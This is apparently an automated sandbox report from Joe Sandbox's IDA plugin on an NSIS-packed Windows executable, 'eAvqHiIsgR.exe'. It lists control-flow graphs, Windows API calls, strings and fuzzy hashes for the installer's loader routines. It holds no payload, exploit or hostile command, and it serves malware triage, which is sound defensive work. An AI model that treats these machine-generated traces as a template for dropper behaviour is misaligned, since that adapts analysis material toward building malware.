403b69-403b9a DialogBoxParamA call 40140b call 40385a 194->200 195->177 201 403bb2-403bb9 call 40140b 195->201 196->167 199->200 200->171 201->177
                                                                      APIs
                                                                        • Part of subcall function 00406500: GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
                                                                        • Part of subcall function 00406500: GetProcAddress.KERNEL32(00000000,?), ref: 0040652D
                                                                      • lstrcatA.KERNEL32(1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000,00000002,75923410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\eAvqHiIsgR.exe",00000000), ref: 00403985
                                                                      • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\tranchet,1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000,00000002,75923410), ref: 004039FA
                                                                      • lstrcmpiA.KERNEL32(?,.exe), ref: 00403A0D
                                                                      • GetFileAttributesA.KERNEL32(Call), ref: 00403A18
                                                                      • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\tranchet), ref: 00403A61
                                                                        • Part of subcall function 00406055: wsprintfA.USER32 ref: 00406062
                                                                      • RegisterClassA.USER32(0042EBC0), ref: 00403A9E
                                                                      • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403AB6
                                                                      • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403AEB
                                                                      • ShowWindow.USER32(00000005,00000000), ref: 00403B21
                                                                      • GetClassInfoA.USER32(00000000,RichEdit20A,0042EBC0), ref: 00403B4D
                                                                      • GetClassInfoA.USER32(00000000,RichEdit,0042EBC0), ref: 00403B5A
                                                                      • RegisterClassA.USER32(0042EBC0), ref: 00403B63
                                                                      • DialogBoxParamA.USER32(?,00000000,00403CA7,00000000), ref: 00403B82
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd
                                                                      Similarity
                                                                      • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                      • String ID: "C:\Users\user\Desktop\eAvqHiIsgR.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\tranchet$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                      • API String ID: 1975747703-2911827090
                                                                      • Opcode ID: eddc3fe444e159470dd51134533c2a37fedb4af5c6bfbfbca7f7312343edc14b
                                                                      • Instruction ID: 74cd8b4f7d81cde8c77274d740e3983652abf123a0ec58253698c850822a2f16
                                                                      • Opcode Fuzzy Hash: eddc3fe444e159470dd51134533c2a37fedb4af5c6bfbfbca7f7312343edc14b
                                                                      • Instruction Fuzzy Hash: EC61A5702402016ED220FB669D46F373ABCEB4474DF50403FF995B62E3DA7DA9068A2D

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 208 402ea1-402eef GetTickCount GetModuleFileNameA call 405c90 211 402ef1-402ef6 208->211 212 402efb-402f29 call 4060f7 call 405ad6 call 4060f7 GetFileSize 208->212 213 4030d1-4030d5 211->213 220 403014-403022 call 402e3d 212->220 221 402f2f 212->221 227 403024-403027 220->227 228 403077-40307c 220->228 223 402f34-402f4b 221->223 225 402f4d 223->225 226 402f4f-402f58 call 4032ea 223->226 225->226 234 40307e-403086 call 402e3d 226->234 235 402f5e-402f65 226->235 230 403029-403041 call 403300 call 4032ea 227->230 231 40304b-403075 GlobalAlloc call 403300 call 4030d8 227->231 228->213 230->228 254 403043-403049 230->254 231->228 259 403088-403099 231->259 234->228 239 402fe1-402fe5 235->239 240 402f67-402f7b call 405c4b 235->240 244 402fe7-402fee call 402e3d 239->244 245 402fef-402ff5 239->245 240->245 257 402f7d-402f84 240->257 244->245 250 403004-40300c 245->250 251 402ff7-403001 call 4065b7 245->251 250->223 258 403012 250->258 251->250 254->228 254->231 257->245 263 402f86-402f8d 257->263 258->220 260 4030a1-4030a6 259->260 261 40309b 259->261 264 4030a7-4030ad 260->264 261->260 263->245 265 402f8f-402f96 263->265 264->264 266 4030af-4030ca SetFilePointer call 405c4b 264->266 265->245 267 402f98-402f9f 265->267 271 4030cf 266->271 267->245 268 402fa1-402fc1 267->268 268->228 270 402fc7-402fcb 268->270 272 402fd3-402fdb 270->272 273 402fcd-402fd1 270->273 271->213 272->245 274 402fdd-402fdf 272->274 273->258 273->272 274->245
                                                                      APIs
                                                                      • GetTickCount.KERNEL32 ref: 00402EB2
                                                                      • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\eAvqHiIsgR.exe,00000400), ref: 00402ECE
                                                                        • Part of subcall function 00405C90: GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\eAvqHiIsgR.exe,80000000,00000003), ref: 00405C94
                                                                        • Part of subcall function 00405C90: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405CB6
                                                                      • GetFileSize.KERNEL32(00000000,00000000,00437000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\eAvqHiIsgR.exe,C:\Users\user\Desktop\eAvqHiIsgR.exe,80000000,00000003), ref: 00402F1A
                                                                      • GlobalAlloc.KERNELBASE(00000040,00000020), ref: 00403050
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd
                                                                      Similarity
                                                                      • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                      • String ID: "C:\Users\user\Desktop\eAvqHiIsgR.exe"$@TA$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\eAvqHiIsgR.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft$a
                                                                      • API String ID: 2803837635-1730591039
                                                                      • Opcode ID: d2642f5c1e57ff917447350ecc80b65a471f1c26fbd3ec2d1bf2d56bf534e989
                                                                      • Instruction ID: b77d5a27d8a3a8735664692b17331c00252a13d20c8f5ee7c59d5cd6c332e3a5
                                                                      • Opcode Fuzzy Hash: d2642f5c1e57ff917447350ecc80b65a471f1c26fbd3ec2d1bf2d56bf534e989
                                                                      • Instruction Fuzzy Hash: B851E471A00204ABDF20AF64DD85FAF7AB8AB14359F60413BF500B22D1C7B89E858B5D

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 496 40618a-406195 497 406197-4061a6 496->497 498 4061a8-4061be 496->498 497->498 499 4061c4-4061cf 498->499 500 4063af-4063b3 498->500 499->500 503 4061d5-4061dc 499->503 501 4061e1-4061eb 500->501 502 4063b9-4063c3 500->502 501->502 506 4061f1-4061f8 501->506 504 4063c5-4063c9 call 4060f7 502->504 505 4063ce-4063cf 502->505 503->500 504->505 508 4063a2 506->508 509 4061fe-406232 506->509 510 4063a4-4063aa 508->510 511 4063ac-4063ae 508->511 512 406238-406242 509->512 513 40634f-406352 509->513 510->500 511->500 514 406244-406248 512->514 515 40625c 512->515 516 406382-406385 513->516 517 406354-406357 513->517 514->515 518 40624a-40624e 514->518 521 406263-40626a 515->521 522 406393-4063a0 lstrlenA 516->522 523 406387-40638e call 40618a 516->523 519 406367-406373 call 4060f7 517->519 520 406359-406365 call 406055 517->520 518->515 524 406250-406254 518->524 534 406378-40637e 519->534 520->534 526 40626c-40626e 521->526 527 40626f-406271 521->527 522->500 523->522 524->515 530 406256-40625a 524->530 526->527 532 406273-40628e call 405fde 527->532 533 4062aa-4062ad 527->533 530->521 542 406293-406296 532->542 537 4062bd-4062c0 533->537 538 4062af-4062bb GetSystemDirectoryA 533->538 534->522 536 406380 534->536 543 406347-40634d call 4063d2 536->543 540 4062c2-4062d0 GetWindowsDirectoryA 537->540 541 40632d-40632f 537->541 539 406331-406334 538->539 539->543 545 406336-40633a 539->545 540->541 541->539 544 4062d2-4062dc 541->544 542->545 546 40629c-4062a5 call 40618a 542->546 543->522 549 4062f6-40630c SHGetSpecialFolderLocation 544->549 550 4062de-4062e1 544->550 545->543 552 40633c-406342 lstrcatA 545->552 546->539 554 40632a 549->554 555 40630e-406328 SHGetPathFromIDListA CoTaskMemFree 549->555 550->549 553 4062e3-4062ea 550->553 552->543 557 4062f2-4062f4 553->557 554->541 555->539 555->554 557->539 557->549
                                                                      APIs
                                                                      • GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 004062B5
                                                                      • GetWindowsDirectoryA.KERNEL32(Call,00000400,?,0042A070,00000000,00405256,0042A070,00000000), ref: 004062C8
                                                                      • SHGetSpecialFolderLocation.SHELL32(00405256,759223A0,?,0042A070,00000000,00405256,0042A070,00000000), ref: 00406304
                                                                      • SHGetPathFromIDListA.SHELL32(759223A0,Call), ref: 00406312
                                                                      • CoTaskMemFree.OLE32(759223A0), ref: 0040631E
                                                                      • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406342
                                                                      • lstrlenA.KERNEL32(Call,?,0042A070,00000000,00405256,0042A070,00000000,00000000,00424248,759223A0), ref: 00406394
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd
                                                                      Similarity
                                                                      • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                      • String ID: #AT$Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                      • API String ID: 717251189-4290025477
                                                                      • Opcode ID: 8246b69a52679e6fada9b088fd1c5cd7587de1068ebf998f283e7bad78f4f284
                                                                      • Instruction ID: 7f70e83a291e570019a42af90a820afb382591873456cc4d5332d159a7ba1b0c
                                                                      • Opcode Fuzzy Hash: 8246b69a52679e6fada9b088fd1c5cd7587de1068ebf998f283e7bad78f4f284
                                                                      • Instruction Fuzzy Hash: 58612470A00110AADF206F65CC90BBE3B75AB55310F52403FE943BA2D1C77C8962DB9E

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 627 401759-40177c call 402bce call 405afc 632 401786-401798 call 4060f7 call 405a8f lstrcatA 627->632 633 40177e-401784 call 4060f7 627->633 638 40179d-4017a3 call 4063d2 632->638 633->638 643 4017a8-4017ac 638->643 644 4017ae-4017b8 call 40646b 643->644 645 4017df-4017e2 643->645 652 4017ca-4017dc 644->652 653 4017ba-4017c8 CompareFileTime 644->653 646 4017e4-4017e5 call 405c6b 645->646 647 4017ea-401806 call 405c90 645->647 646->647 655 401808-40180b 647->655 656 40187e-4018a7 call 40521e call 4030d8 647->656 652->645 653->652 657 401860-40186a call 40521e 655->657 658 40180d-40184f call 4060f7 * 2 call 40618a call 4060f7 call 405813 655->658 668 4018a9-4018ad 656->668 669 4018af-4018bb SetFileTime 656->669 670 401873-401879 657->670 658->643 690 401855-401856 658->690 668->669 672 4018c1-4018cc CloseHandle 668->672 669->672 673 402a63 670->673 676 4018d2-4018d5 672->676 677 402a5a-402a5d 672->677 678 402a65-402a69 673->678 680 4018d7-4018e8 call 40618a lstrcatA 676->680 681 4018ea-4018ed call 40618a 676->681 677->673 687 4018f2-402382 680->687 681->687 691 402387-40238c 687->691 692 402382 call 405813 687->692 690->670 693 401858-401859 690->693 691->678 692->691 693->657
                                                                      APIs
                                                                      • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\tranchet\Trykmaalere,00000000,00000000,00000031), ref: 00401798
                                                                      • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\tranchet\Trykmaalere,00000000,00000000,00000031), ref: 004017C2
                                                                        • Part of subcall function 004060F7: lstrcpynA.KERNEL32(?,?,00000400,0040341A,sprjtelakeringer Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 00406104
                                                                        • Part of subcall function 0040521E: lstrlenA.KERNEL32(0042A070,00000000,00424248,759223A0,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                                        • Part of subcall function 0040521E: lstrlenA.KERNEL32(00403233,0042A070,00000000,00424248,759223A0,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                                        • Part of subcall function 0040521E: lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,00424248,759223A0), ref: 0040527A
                                                                        • Part of subcall function 0040521E: SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                                                                        • Part of subcall function 0040521E: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
                                                                        • Part of subcall function 0040521E: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
                                                                        • Part of subcall function 0040521E: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nso2EAF.tmp$C:\Users\user\AppData\Local\Temp\nso2EAF.tmp\System.dll$C:\Users\user\tranchet\Trykmaalere$Call
                                                                      • API String ID: 1941528284-3239533306
                                                                      • Opcode ID: 90f03a76fcf5146749e92d53d58810ea094b6bbbf58b510143803768f557fb10
                                                                      • Instruction ID: bb6028c3778eb4cec0c6c1d7eb8bf073a5325157b60575559d09146ef789c5eb
                                                                      • Opcode Fuzzy Hash: 90f03a76fcf5146749e92d53d58810ea094b6bbbf58b510143803768f557fb10
                                                                      • Instruction Fuzzy Hash: D4419A32900515BACB107BB5CC45DAF3678EF05329F20833FF426B51E1DA7C8A529A6D

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 694 4030d8-4030ec 695 4030f5-4030fe 694->695 696 4030ee 694->696 697 403100 695->697 698 403107-40310c 695->698 696->695 697->698 699 40311c-403129 call 4032ea 698->699 700 40310e-403117 call 403300 698->700 704 4032d8 699->704 705 40312f-403133 699->705 700->699 706 4032da-4032db 704->706 707 403283-403285 705->707 708 403139-403182 GetTickCount 705->708 711 4032e3-4032e7 706->711 709 4032c5-4032c8 707->709 710 403287-40328a 707->710 712 4032e0 708->712 713 403188-403190 708->713 714 4032ca 709->714 715 4032cd-4032d6 call 4032ea 709->715 710->712 716 40328c 710->716 712->711 717 403192 713->717 718 403195-4031a3 call 4032ea 713->718 714->715 715->704 727 4032dd 715->727 721 40328f-403295 716->721 717->718 718->704 726 4031a9-4031b2 718->726 724 403297 721->724 725 403299-4032a7 call 4032ea 721->725 724->725 725->704 731 4032a9-4032b5 call 405d37 725->731 730 4031b8-4031d8 call 406625 726->730 727->712 736 40327b-40327d 730->736 737 4031de-4031f1 GetTickCount 730->737 738 4032b7-4032c1 731->738 739 40327f-403281 731->739 736->706 740 4031f3-4031fb 737->740 741 403236-403238 737->741 738->721 742 4032c3 738->742 739->706 743 403203-403233 MulDiv wsprintfA call 40521e 740->743 744 4031fd-403201 740->744 745 40323a-40323e 741->745 746 40326f-403273 741->746 742->712 743->741 744->741 744->743 749 403240-403247 call 405d37 745->749 750 403255-403260 745->750 746->713 747 403279 746->747 747->712 754 40324c-40324e 749->754 751 403263-403267 750->751 751->730 755 40326d 751->755 754->739 756 403250-403253 754->756 755->712 756->751
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd
                                                                      Similarity
                                                                      • API ID: CountTick$wsprintf
                                                                      • String ID: ... %d%%$HBB
                                                                      • API String ID: 551687249-372310663
                                                                      • Opcode ID: 6105a75ac29723741842d4acb1fda97f5bbbd1560d169b08801a999ce2df6a86
                                                                      • Instruction ID: fb515496a62f3aa3a261881475cff076317c99cf113f2c02ef85df511ffa7adb
                                                                      • Opcode Fuzzy Hash: 6105a75ac29723741842d4acb1fda97f5bbbd1560d169b08801a999ce2df6a86
                                                                      • Instruction Fuzzy Hash: 68515C71900219ABCB10DF95DA44A9E7BA8EF54356F1481BFE800B72D0C7789A41CBAD

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetDC.USER32(?), ref: 00401E38
                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E52
                                                                      • MulDiv.KERNEL32(00000000,00000000), ref: 00401E5A
                                                                      • ReleaseDC.USER32(?,00000000), ref: 00401E6B
                                                                      • CreateFontIndirectA.GDI32(0040B838), ref: 00401EBA
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd
                                                                      Similarity
                                                                      • API ID: CapsCreateDeviceFontIndirectRelease
                                                                      • String ID: Calibri
                                                                      • API String ID: 3808545654-1409258342
                                                                      • Opcode ID: f10f52d3ac84b2d12136eae3b4e18ea67906ed9852a07f942bb56bd2ae0fd4ab
                                                                      • Instruction ID: 5cb61850c30ba341adb392aac0b64178207aa51c0a8ebf491f77c064e1fc76ea
                                                                      • Opcode Fuzzy Hash: f10f52d3ac84b2d12136eae3b4e18ea67906ed9852a07f942bb56bd2ae0fd4ab
                                                                      • Instruction Fuzzy Hash: A9019E72500240AFE7007BB0AE4AB9A3FF8EB55311F10843EF281B61F2CB7904458B6C

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 770 4056e4-40572f CreateDirectoryA 771 405731-405733 770->771 772 405735-405742 GetLastError 770->772 774 40575c-40575e 771->774 773 405744-405758 SetFileSecurityA 772->773 772->774 773->771 775 40575a GetLastError 773->775 775->774
                                                                      APIs
                                                                      • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405727
                                                                      • GetLastError.KERNEL32 ref: 0040573B
                                                                      • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405750
                                                                      • GetLastError.KERNEL32 ref: 0040575A
                                                                      Strings
                                                                      • C:\Users\user\Desktop, xrefs: 004056E4
                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 0040570A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                                                      • API String ID: 3449924974-1521822154
                                                                      • Opcode ID: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
                                                                      • Instruction ID: 199f41d5e308de8b96f609cf750b761cce64c3ab1ca85d652f9564a15c89f022
                                                                      • Opcode Fuzzy Hash: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
                                                                      • Instruction Fuzzy Hash: FF010471C00219EADF019BA0C944BEFBBB8EB04354F00403AD944B6290E7B89A48DBA9

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 776 406492-4064b2 GetSystemDirectoryA 777 4064b4 776->777 778 4064b6-4064b8 776->778 777->778 779 4064c8-4064ca 778->779 780 4064ba-4064c2 778->780 782 4064cb-4064fd wsprintfA LoadLibraryExA 779->782 780->779 781 4064c4-4064c6 780->781 781->782
                                                                      APIs
                                                                      • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004064A9
                                                                      • wsprintfA.USER32 ref: 004064E2
                                                                      • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004064F6
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd
                                                                      Similarity
                                                                      • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                      • String ID: %s%s.dll$UXTHEME$\
                                                                      • API String ID: 2200240437-4240819195
                                                                      • Opcode ID: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
                                                                      • Instruction ID: 03f82d29dddd483449b3488b7c2e1daaa1831c8d2f1a72e13e07ee25955ceb49
                                                                      • Opcode Fuzzy Hash: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
                                                                      • Instruction Fuzzy Hash: DDF0213051020A6BDB55D764DD0DFFB375CEB08304F14017AA58AF11C1DA78D5398B6D

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 783 405cbf-405cc9 784 405cca-405cf5 GetTickCount GetTempFileNameA 783->784 785 405d04-405d06 784->785 786 405cf7-405cf9 784->786 788 405cfe-405d01 785->788 786->784 787 405cfb 786->787 787->788
                                                                      APIs
                                                                      • GetTickCount.KERNEL32 ref: 00405CD3
                                                                      • GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000007,00000009,0000000B), ref: 00405CED
                                                                      Strings
                                                                      • nsa, xrefs: 00405CCA
                                                                      • "C:\Users\user\Desktop\eAvqHiIsgR.exe", xrefs: 00405CBF
